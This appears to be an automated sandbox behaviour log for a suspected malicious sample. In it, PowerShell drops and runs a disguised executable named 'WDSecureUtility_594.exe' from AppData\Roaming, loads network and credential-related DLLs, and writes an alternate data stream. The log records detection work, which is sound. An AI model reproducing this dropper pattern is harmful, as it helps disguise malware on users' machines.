            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe "C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe" -pkek -aoa -y
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe "C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe" -pkek -aoa -y Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeFile created: :newads (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
